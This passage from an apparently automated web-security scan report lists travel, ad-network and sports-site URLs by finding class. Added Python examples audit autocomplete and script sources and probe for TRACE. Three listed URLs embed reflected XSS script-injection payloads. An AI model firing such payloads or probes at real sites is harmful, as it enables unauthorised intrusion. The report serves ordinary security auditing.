19.36. http://ad.yieldmanager.com/iframe3

19.37. http://ad.yieldmanager.com/iframe3

19.38. http://ad.yieldmanager.com/iframe3

19.39. http://ad.yieldmanager.com/iframe3

19.40. http://ad.yieldmanager.com/iframe3

19.41. http://ad.yieldmanager.com/iframe3

19.42. http://ad.yieldmanager.com/iframe3

19.43. http://ad.yieldmanager.com/iframe3

19.44. http://ad.yieldmanager.com/iframe3

19.45. http://ad.yieldmanager.com/iframe3

19.46. http://ad.yieldmanager.com/iframe3

19.47. http://ad.yieldmanager.com/iframe3

19.48. http://ad.yieldmanager.com/iframe3

19.49. http://ad.yieldmanager.com/iframe3

19.50. http://ad.yieldmanager.com/iframe3

19.51. http://ad.yieldmanager.com/iframe3

19.52. http://ad.yieldmanager.com/iframe3

19.53. http://ad.yieldmanager.com/iframe3

19.54. http://ad.yieldmanager.com/iframe3

19.55. http://ad.yieldmanager.com/iframe3

19.56. http://ad.yieldmanager.com/iframe3

19.57. http://ad.yieldmanager.com/iframe3

19.58. http://ad.yieldmanager.com/iframe3

19.59. http://ad.yieldmanager.com/iframe3

19.60. http://ad.yieldmanager.com/iframe3

19.61. http://ad.yieldmanager.com/iframe3

19.62. http://ad.yieldmanager.com/iframe3

19.63. http://ad.yieldmanager.com/iframe3

19.64. http://ad.yieldmanager.com/iframe3

19.65. http://ad.yieldmanager.com/iframe3

19.66. http://ad.yieldmanager.com/iframe3

19.67. http://ad.yieldmanager.com/iframe3

19.68. http://ad.yieldmanager.com/iframe3

19.69. http://ad.yieldmanager.com/iframe3

19.70. http://ad.yieldmanager.com/iframe3

19.71. http://ad.yieldmanager.com/iframe3

19.72. http://ad.yieldmanager.com/iframe3

19.73. http://ad.yieldmanager.com/iframe3

19.74. http://ad.yieldmanager.com/iframe3

19.75. http://ad.yieldmanager.com/iframe3

19.76. http://ad.yieldmanager.com/iframe3

19.77. http://ad.yieldmanager.com/iframe3

19.78. http://ad.yieldmanager.com/iframe3

19.79. http://ad.yieldmanager.com/iframe3

19.80. http://ad.yieldmanager.com/iframe3

19.81. http://ad.yieldmanager.com/iframe3

19.82. http://ad.yieldmanager.com/iframe3

19.83. http://ad.yieldmanager.com/iframe3

19.84. http://ad.yieldmanager.com/iframe3

19.85. http://ad.yieldmanager.com/iframe3

19.86. http://ad.yieldmanager.com/iframe3

19.87. http://ad.yieldmanager.com/imp

19.88. http://ad.yieldmanager.com/imp

19.89. http://ads.pointroll.com/PortalServe/

19.90. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH

19.91. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2812309%7C0%7C1%7CADTECH

19.92. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2812326%7C0%7C1%7CADTECH

19.93. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH

19.94. http://adserver.adtech.de/addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH

19.95. http://adserver.adtech.de/addyn%7C3.0%7C999%7C3106021%7C0%7C168%7CADTECH

19.96. http://adserver.adtech.de/addyn%7C3.0%7C999%7C3173523%7C0%7C477%7CADTECH

19.97. http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH

19.98. http://afe.specificclick.net/

19.99. http://afe.specificclick.net/

19.100. http://as.chango.com/links/adunit/1.31759988192e+12

19.101. http://bh.contextweb.com/bh/rtset

19.102. http://bp.specificclick.net/

19.103. http://bp.specificclick.net/

19.104. http://cdn.flashtalking.com/container/4649/4649.js

19.105. http://clk.specificclick.net/click/v=5

19.106. http://cm.g.doubleclick.net/pixel

19.107. http://cm.g.doubleclick.net/pixel

19.108. http://cm.g.doubleclick.net/pixel

19.109. http://cm.g.doubleclick.net/pixel

19.110. http://cm.g.doubleclick.net/pixel

19.111. http://cm.g.doubleclick.net/pixel

19.112. http://cm.g.doubleclick.net/pixel

19.113. http://cm.g.doubleclick.net/pixel

19.114. http://cm.g.doubleclick.net/pixel

19.115. http://cms.ad.yieldmanager.net/v1/cms

19.116. http://d.tradex.openx.com/afr.php

19.117. http://d.tradex.openx.com/afr.php

19.118. http://d.tradex.openx.com/afr.php

19.119. http://delivery.hotels.com/Hotels/Delivery.aspx

19.120. http://dm.travelocity.com/html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176

19.121. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

19.122. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&dest=BOS&random=042027615

19.123. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&random=869493130

19.124. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=342x296&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

19.125. http://extras.expedia.com/Hotels/Delivery/HSDirect.aspx

19.126. http://fls.doubleclick.net/activityi

19.127. http://fls.doubleclick.net/activityi

19.128. http://fls.doubleclick.net/activityi

19.129. http://fls.doubleclick.net/activityi

19.130. http://fls.doubleclick.net/activityi

19.131. http://fls.doubleclick.net/activityi

19.132. http://fls.doubleclick.net/activityi

19.133. http://fls.doubleclick.net/activityi

19.134. http://fls.doubleclick.net/activityi

19.135. http://fls.doubleclick.net/activityi

19.136. http://fls.doubleclick.net/activityi

19.137. https://go.americanexpress-travel.com/hotel/HotelCobrand.do

19.138. http://googleads.g.doubleclick.net/pagead/ads

19.139. http://googleads.g.doubleclick.net/pagead/ads

19.140. http://googleads.g.doubleclick.net/pagead/ads

19.141. http://googleads.g.doubleclick.net/pagead/ads

19.142. http://googleads.g.doubleclick.net/pagead/ads

19.143. http://googleads.g.doubleclick.net/pagead/ads

19.144. http://hublotnation.com/

19.145. http://ib.adnxs.com/ab

19.146. http://ib.adnxs.com/if

19.147. http://ib.adnxs.com/if

19.148. http://ib.adnxs.com/if

19.149. http://ib.adnxs.com/seg

19.150. http://ib.adnxs.com/ttj

19.151. http://int.teracent.net/tase/int

19.152. http://o-va1.wtp101.com/imp

19.153. http://o-va1.wtp101.com/imp

19.154. http://o-va3.wtp101.com/imp

19.155. http://o-va3.wtp101.com/imp

19.156. http://oas.guardian.co.uk/RealMedia/ads/adstream_mjx.ads/www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live/oas.html/1643482332@Top,Middle2,Right1,x31,Position4

19.157. http://oas.guardian.co.uk/RealMedia/ads/adstream_mjx.ads/www.guardian.co.uk/football/manchester-united/oas.html/1603912970@Top,Right1,x31,Position4

19.158. http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html

19.159. http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html

19.160. http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html

19.161. http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html

19.162. http://searchit.sabre.com/query.html

19.163. http://seg.sharethis.com/getSegment.php

19.164. http://showadsak.pubmatic.com/AdServer/AdServerServlet

19.165. http://static.igougo.com/scripts/all_53403.ashx

19.166. http://tag.admeld.com/id

19.167. http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html

19.168. http://travel.travelocity.com/hotel/HotelAvailability.do

19.169. http://travel.travelocity.com/hotel/HotelCobrand.do

19.170. http://travel.travelocity.com/hotel/HotelDetail.do

19.171. http://travela.priceline.com/hotel/newHotelSearch.do

19.172. http://travela.priceline.com/hotel/searchHotels.do

19.173. http://travela.priceline.com/hotel/searchResults.do

19.174. http://travela.priceline.com/hotel/searchResults.do

19.175. http://www.agoda.com/pages/agoda/default/page_AdScript.aspx

19.176. http://www.aon.com/site/search.jsp

19.177. http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm

19.178. http://www.barclayswealth.com/international/i-alert.htm

19.179. http://www.booking.com/general.en-us.html

19.180. http://www.booking.com/hotel/us/c-boston-massachusettes.html

19.181. http://www.booking.com/hotel/us/copley-square.en-us.html

19.182. http://www.booking.com/index.en-us.html

19.183. http://www.booking.com/searchresults.html

19.184. http://www.cheaptickets.com/shop/hotelsearch

19.185. http://www.expedia.com/Boston-Hotels-Hotel-Commonwealth.h894999.Hotel-Information

19.186. http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information

19.187. http://www.expedia.com/Hotel-Search

19.188. http://www.expedia.com/static/default/default/scripts/exp/core/ChannelTracking.js

19.189. http://www.facebook.com/plugins/likebox.php

19.190. http://www.facebook.com/plugins/likebox.php

19.191. http://www.getaroom.com/washington-dc

19.192. http://www.goal.com/en/comment/comments-box

19.193. http://www.google.com/cse

19.194. http://www.google.com/search

19.195. http://www.google.com/search

19.196. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm

19.197. http://www.hotelplanner.com/Search/Index.cfm

19.198. https://www.hotelplanner.com/Accept/Reserve.cfm

19.199. http://www.hotels.com/hotel/details.html

19.200. http://www.hotels.com/hotel/hoteldata.html

19.201. http://www.hotels.com/search.do

19.202. http://www.hotels.com/search/search.html

19.203. http://www.hotwire.com/hotel/details.jsp

19.204. http://www.hotwire.com/hotel/results.jsp

19.205. http://www.igougo.com/WebResource.axd

19.206. http://www.igougo.com/WebResource.axd

19.207. http://www.igougo.com/WebResource.axd

19.208. http://www.igougo.com/WebResource.axd

19.209. http://www.igougo.com/WebResource.axd

19.210. http://www.igougo.com/WebResource.axd

19.211. http://www.igougo.com/WebResource.axd

19.212. http://www.igougo.com/traveldeals/ratefinder.aspx

19.213. http://www.jscache.com/weimg

19.214. http://www.manutd.com/One-United/Login.aspx

19.215. http://www.manutd.com/Search-Results.aspx

19.216. http://www.manutd.com/en/Club/Sponsors.aspx

19.217. http://www.mufoundation.org/Search.aspx

19.218. http://www.nike.com/nikefootball/home/

19.219. http://www.nike.com/nikefootball/home/socialfeeds

19.220. http://www.nike.com/nikefootball/home/twitterfeed

19.221. http://www.orbitz.com/App/SubmitQuickSearch

19.222. http://www.orbitz.com/App/SubmitQuickSearch

19.223. http://www.orbitz.com/App/SubmitQuickSearch

19.224. http://www.orbitz.com/App/ViewFlightSearchResults

19.225. http://www.orbitz.com/shared/adserverProxy.jsp

19.226. http://www.orbitz.com/shared/adserverProxy.jsp

19.227. http://www.orbitz.com/shared/adserverProxy.jsp

19.228. http://www.orbitz.com/shared/adserverProxy.jsp

19.229. http://www.orbitz.com/shared/adserverProxy.jsp

19.230. http://www.orbitz.com/shared/adserverProxy.jsp

19.231. http://www.orbitz.com/shared/adserverProxy.jsp

19.232. http://www.orbitz.com/shared/adserverProxy.jsp

19.233. http://www.orbitz.com/shared/adserverProxy.jsp

19.234. http://www.orbitz.com/shared/adserverProxy.jsp

19.235. http://www.orbitz.com/shared/adserverProxy.jsp

19.236. http://www.orbitz.com/shared/adserverProxy.jsp

19.237. http://www.orbitz.com/shop/hotelsearch

19.238. http://www.orbitz.com/shop/hotelsearch

19.239. http://www.orbitz.com/shop/hotelsearch

19.240. http://www.premierleague.com/page/SearchResults/

19.241. http://www.sabrehospitality.com/

19.242. http://www.sabretravelnetwork.com/home/search/show_results

19.243. http://www.travelocity.com/popWindow2

19.244. http://www.trip.com/

19.245. http://www.trip.com/box_ad_refresh.html

19.246. http://www.tripadvisor.com/CheckMore

19.247. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

19.248. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

19.249. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

20. Cross-domain script include

20.1. http://ad.doubleclick.net/adi/N6010.456584.XAXIS.COM/B5752701.15

20.2. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.28

20.3. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.30

20.4. http://ad.doubleclick.net/adi/gna.en/level2

20.5. http://ad.yieldmanager.com/iframe3

20.6. http://ads.pubmatic.com/HostedThirdPartyPixels/TF/ae_12232010.html

20.7. http://as.chango.com/links/adunit/1.31759988192e+12

20.8. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771877&tile=128609801075344&section=results

20.9. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details

20.10. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results

20.11. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344&section=results

20.12. http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344&section=results

20.13. http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&adloc=NA&random=656361&tile=564238840132219&section=details

20.14. http://fls.doubleclick.net/activityi

20.15. https://go.americanexpress-travel.com/hotel/HotelCobrand.do

20.16. http://googleads.g.doubleclick.net/pagead/ads

20.17. http://googleads.g.doubleclick.net/pagead/ads

20.18. http://googleads.g.doubleclick.net/pagead/ads

20.19. http://hublotnation.com/

20.20. http://hublotnation.com/

20.21. http://hublotnation.com/2011/09/23/hublot-watchesa-look-at-the-king-power-dwayne-wade/

20.22. http://ib.adnxs.com/if

20.23. http://ib.adnxs.com/if

20.24. http://ib.adnxs.com/if

20.25. http://o-va1.wtp101.com/imp

20.26. http://o-va1.wtp101.com/imp

20.27. http://o-va3.wtp101.com/imp

20.28. http://o-va3.wtp101.com/imp

20.29. http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html

20.30. http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html

20.31. http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html

20.32. http://r1-ads.ace.advertising.com/site=812162/size=160600/u=2/bnum=34930016/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149

20.33. http://r1-ads.ace.advertising.com/site=812162/size=160600/u=2/bnum=78334226/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

20.34. http://r1-ads.ace.advertising.com/site=812164/size=728090/u=2/bnum=23819479/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

20.35. http://seg.sharethis.com/getSegment.php

20.36. http://static.igougo.com/scripts/all_53403.ashx

20.37. http://static.igougo.com/traveldeals/iAuto.aspx

20.38. http://travel.travelocity.com/hotel/HotelAvailability.do

20.39. http://travel.travelocity.com/hotel/HotelCobrand.do

20.40. http://travel.travelocity.com/hotel/HotelDetail.do

20.41. http://travela.priceline.com/hotel/newHotelSearch.do

20.42. http://travela.priceline.com/hotel/searchResults.do

20.43. http://www.aon.com/manchesterunited/

20.44. http://www.booking.com/general.en-us.html

20.45. http://www.booking.com/hotel/us/c-boston-massachusettes.html

20.46. http://www.booking.com/hotel/us/copley-square.en-us.html

20.47. http://www.booking.com/index.en-us.html

20.48. http://www.booking.com/searchresults.html

20.49. http://www.cheaptickets.com/shop/hotelsearch

20.50. http://www.cmegroup.com/advance/

20.51. http://www.facebook.com/plugins/likebox.php

20.52. http://www.facebook.com/plugins/likebox.php

20.53. http://www.getaroom.com/

20.54. http://www.goal.com/en/comment/comments-box

20.55. http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run

20.56. http://www.goal.com/en/teams/england/97/man-utd-news

20.57. http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live

20.58. http://www.guardian.co.uk/football/manchester-united

20.59. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm

20.60. http://www.hotelplanner.com/Search/Index.cfm

20.61. https://www.hotelplanner.com/Accept/Reserve.cfm

20.62. http://www.hotels.com/hotel/details.html

20.63. http://www.hotels.com/search.do

20.64. http://www.hotels.com/search/search.html

20.65. http://www.hotwire.com/hotel/details.jsp

20.66. http://www.hotwire.com/hotel/results.jsp

20.67. http://www.igougo.com/WebResource.axd

20.68. http://www.igougo.com/WebResource.axd

20.69. http://www.igougo.com/WebResource.axd

20.70. http://www.igougo.com/WebResource.axd

20.71. http://www.igougo.com/WebResource.axd

20.72. http://www.igougo.com/WebResource.axd

20.73. http://www.igougo.com/WebResource.axd

20.74. http://www.igougo.com/about/

20.75. http://www.igougo.com/traveldeals/ratefinder.aspx

20.76. http://www.igougo.com/xd_receiver.aspx

20.77. http://www.manutd.com/

20.78. http://www.manutd.com/One-United/Login.aspx

20.79. http://www.manutd.com/Search-Results.aspx

20.80. http://www.manutd.com/Splash-Page.aspx

20.81. http://www.manutd.com/en.aspx

20.82. http://www.manutd.com/en/Club/Sponsors.aspx

20.83. http://www.manutd.com/en/Fanzone/Competition-And-Polls.aspx

20.84. http://www.manutd.com/en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx

20.85. http://www.manutd.com/en/One-United.aspx

20.86. http://www.orbitz.com/

20.87. http://www.orbitz.com/

20.88. http://www.orbitz.com/App/SubmitQuickSearch

20.89. http://www.orbitz.com/App/SubmitQuickSearch

20.90. http://www.orbitz.com/App/SubmitQuickSearch

20.91. http://www.orbitz.com/App/ViewFlightSearchResults

20.92. http://www.orbitz.com/shop/hotelsearch

20.93. http://www.orbitz.com/shop/hotelsearch

20.94. http://www.premierleague.com/page/Headlines/0,,12306~2466648,00.html

20.95. http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html

20.96. http://www.premierleague.com/page/Home

20.97. http://www.premierleague.com/page/Home/0,,12306,00.html

20.98. http://www.premierleague.com/page/Players/0,,12306,00.html

20.99. http://www.premierleague.com/page/SearchResults/

20.100. http://www.sabrehospitality.com/

20.101. http://www.sabrehospitality.com/hotel-distribution-systems.php

20.102. http://www.sabretravelnetwork.com/home

20.103. http://www.sabretravelnetwork.com/home/

20.104. http://www.sabretravelnetwork.com/home/products_services/product_index/

20.105. http://www.sabretravelnetwork.com/home/products_services/product_index/images/loadingAnimation.gif

20.106. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/

20.107. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/images/loadingAnimation.gif

20.108. http://www.sabretravelnetwork.com/home/search/show_results

20.109. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif

20.110. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

20.111. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

20.112. http://www.sabretravelnetwork.com/images/home-text.png

20.113. http://www.sabretravelnetwork.com/map.html

20.114. http://www.travelocity.com/

20.115. http://www.travelocity.com/472a

20.116. http://www.travelocity.com/popWindow2

20.117. http://www.trip.com/

20.118. http://www.trip.com/box_ad_refresh.html

20.119. http://www.trip.com/hotels.html

20.120. http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
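Two of the finding classes indexed above, "Password field with autocomplete enabled" (section 15) and "Cross-domain script include" (section 20), are passive checks that can be reproduced from a saved HTML response alone. The following is an added example written for this report, not the scanner's own code: a small parser that flags password inputs that neither the field nor the enclosing form marks autocomplete="off", and any script src that resolves to a host other than the page's own. The page URL and HTML below are constructed for illustration and were not fetched from any site listed here.

```python
"""Passive HTML audit: password-field autocomplete and cross-domain <script src>.

Added example, not the scanner's code. SAMPLE_URL / SAMPLE_HTML are constructed
test data (hypothetical hosts under the reserved .test TLD).
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class AuditParser(HTMLParser):
    """Collects two finding classes from one page while streaming the HTML."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.page_host = urlsplit(page_url).hostname.lower()
        self._form_action = None            # action of the <form> currently open
        self._form_autocomplete_off = False  # form-level autocomplete="off" covers its fields
        self.password_autocomplete_on = []   # (form action, field name)
        self.cross_domain_scripts = []       # absolute script URLs on other hosts

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}   # boolean attrs arrive as None
        if tag == "form":
            self._form_action = a.get("action", "")
            self._form_autocomplete_off = a.get("autocomplete", "").lower() == "off"
        elif tag == "input" and a.get("type", "").lower() == "password":
            field_off = a.get("autocomplete", "").lower() == "off"
            if not (field_off or self._form_autocomplete_off):
                self.password_autocomplete_on.append((self._form_action, a.get("name", "")))
        elif tag == "script" and a.get("src"):
            # urljoin resolves relative paths and scheme-relative "//host/..." sources
            src = urljoin(self.page_url, a["src"])
            host = urlsplit(src).hostname
            if host and host.lower() != self.page_host:
                self.cross_domain_scripts.append(src)

    def handle_endtag(self, tag):
        if tag == "form":
            self._form_action = None
            self._form_autocomplete_off = False


def audit_page(page_url, html):
    """Return both finding lists for one page body."""
    p = AuditParser(page_url)
    p.feed(html)
    p.close()
    return {
        "password_autocomplete": p.password_autocomplete_on,
        "cross_domain_scripts": p.cross_domain_scripts,
    }


# Constructed sample: one same-host script, one third-party script, and three
# password fields of which only the first lacks any autocomplete="off".
SAMPLE_URL = "http://www.example-travel.test/One-United/Login.aspx"
SAMPLE_HTML = """
<html><head>
<script src="/js/site.js"></script>
<script src="//ad.example-cdn.test/tag.js"></script>
<script src="http://www.example-travel.test/js/local.js"></script>
</head><body>
<form action="/Login.aspx" method="post">
  <input type="text" name="user">
  <input type="password" name="pass">
</form>
<form action="/Reset.aspx" method="post" autocomplete="off">
  <input type="password" name="newpass">
</form>
<form action="/Other.aspx" method="post">
  <input type="password" name="pin" autocomplete="off">
</form>
</body></html>
"""

if __name__ == "__main__":
    for finding, items in audit_page(SAMPLE_URL, SAMPLE_HTML).items():
        print(finding, items)
```

Two caveats when reading the output against this report. The script check compares full hostnames, so a static or CDN subdomain of the same site is reported alongside genuine third parties; whether same-site subdomains are trusted is a policy decision, and the ad-network hosts that dominate section 20 are the ones that matter, since any script they serve runs with the including page's origin. The autocomplete finding reflects the guidance of the report's date: current browser password managers ignore autocomplete="off" on login fields, so today this is at most a hardening note, not a vulnerability.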

21. TRACE method is enabled

21.1. http://bcp.crwdcntrl.net/

21.2. http://bh.contextweb.com/

21.3. http://cacheserve.williamhill.com/

21.4. http://d.tradex.openx.com/

21.5. http://event.publishflow.com/

21.6. http://m.xp1.ru4.com/

21.7. http://matcher-cwb.bidder7.mookie1.com/

21.8. http://optimized-by.rubiconproject.com/

21.9. http://r.openx.net/

21.10. http://tap.rubiconproject.com/

21.11. http://www.guardian.co.uk/

21.12. http://www.luminate.com/
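The "TRACE method is enabled" entries above (section 21) are the one finding class here that needs an active request to confirm. The following is an added example, not the scanner's code: it sends a TRACE carrying a marker header and treats the method as enabled only when the server answers 200 with a message/http body that echoes the marker, which is the behaviour that makes TRACE interesting (it reflects whatever headers the client sent, cookies included). The response-classification step is kept separate from the socket code so it can be exercised on the constructed responses below without network access; the host names passed to probe() are the caller's own assumption.

```python
"""TRACE probe with an offline-testable response check.

Added example, not the scanner's code. ECHOED and REFUSED are constructed
sample responses, not captures from any host in this report.
"""
import socket

MARKER_NAME = b"x-trace-probe"
MARKER_VALUE = b"canary-7f3a"


def build_trace_request(host, path="/"):
    """Plain HTTP/1.1 TRACE with a marker header the server would have to echo."""
    return (
        f"TRACE {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"{MARKER_NAME.decode()}: {MARKER_VALUE.decode()}\r\n"
        "Connection: close\r\n\r\n"
    ).encode("ascii")


def trace_enabled(raw_response):
    """True only for a 200 message/http reply whose body reflects the marker header."""
    head, _, body = raw_response.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    if not lines or not lines[0].startswith(b"HTTP/"):
        return False
    status = lines[0].split()
    if len(status) < 2 or status[1] != b"200":
        return False
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip().lower()
    if not headers.get(b"content-type", b"").startswith(b"message/http"):
        return False
    # The echoed request body is the actual evidence; a 200 alone is not enough.
    return MARKER_NAME + b": " + MARKER_VALUE in body.lower()


def probe(host, port=80, timeout=5.0):
    """Send one TRACE to host:port and classify the raw reply (network access required)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_trace_request(host))
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return trace_enabled(b"".join(chunks))


# Constructed responses: the first is what an httpd with TraceEnable on returns,
# the second what a server that rejects the method returns.
ECHOED = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: message/http\r\n"
    b"Connection: close\r\n\r\n"
    b"TRACE / HTTP/1.1\r\nHost: example.test\r\n"
    b"X-Trace-Probe: canary-7f3a\r\nConnection: close\r\n\r\n"
)
REFUSED = (
    b"HTTP/1.1 405 Method Not Allowed\r\n"
    b"Allow: GET, HEAD, POST\r\n"
    b"Content-Length: 0\r\n\r\n"
)

if __name__ == "__main__":
    print("echoed sample:", trace_enabled(ECHOED))
    print("refused sample:", trace_enabled(REFUSED))
```

Requiring the marker in the body avoids two false positives a bare status check would produce: servers that return 200 with an error page for any unknown method, and proxies that answer on the origin's behalf. On Apache httpd the fix is TraceEnable off; on other servers, deny the method in the front-end configuration and re-run the probe against every listed host, since several of the section 21 entries are ad-network endpoints rather than the travel sites themselves.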

22. Email addresses disclosed

22.1. http://a.cdn.intentmedia.net/javascripts/intent_media_cheaptickets_ads_fif.js

22.2. http://ads2.adbrite.com/v0/ad

22.3. http://ak-static.travel-ticker.com/static/images/1x1.jpg

22.4. http://aon.com/js/s_code.js

22.5. http://httpd.apache.org/

22.6. http://httpd.apache.org/download.cgi

22.7. http://i.travelpn.com.edgesuite.net/jquery/plug-ins/jquery.cookie.js

22.8. http://i1.goal.com/web/goal/2011092112-rev15541/js/default/news/article-merged.js

22.9. http://i1.goal.com/web/goal/2011092112-rev15541/js/default/section/team-merged.js

22.10. http://media.away.com/trip/tripjs/s_code.js

22.11. https://secure.mlb.com/shared/scripts/bam/bam.session.js

22.12. http://sorry.manutd.com/errorRedirector.html

22.13. http://static.guim.co.uk/static/32b9600ebe43926107624a816c7870f8566f154f/common/external-scripts/jquery-libraries/jquery.cookie.js

22.14. http://travela.priceline.com/zp/zpcal/src/calendar-core.js

22.15. http://travelocity.ugc.bazaarvoice.com/module/0025-en_us/sy/0025-en_us/display.pkg.js

22.16. http://w.sharethis.com/button/buttons.js

22.17. http://www.aon.com/js/s_code.js

22.18. http://www.barclayswealth.com/Scripts/swfobject_modified.js

22.19. http://www.barclayswealth.com/important-information.htm

22.20. http://www.expedia.com/static/default/default/scripts/formController.js

22.21. http://www.google.com/search

22.22. http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live

22.23. http://www.hotels.com/hotel/details.html

22.24. http://www.hotels.com/search.do

22.25. http://www.hotels.com/search/search.html

22.26. http://www.manutd.com/styles/js/jquery.jqplugin.1.0.2.min.js

22.27. http://www.nike.com/nikeos/global/js/NIKEOS.global.js

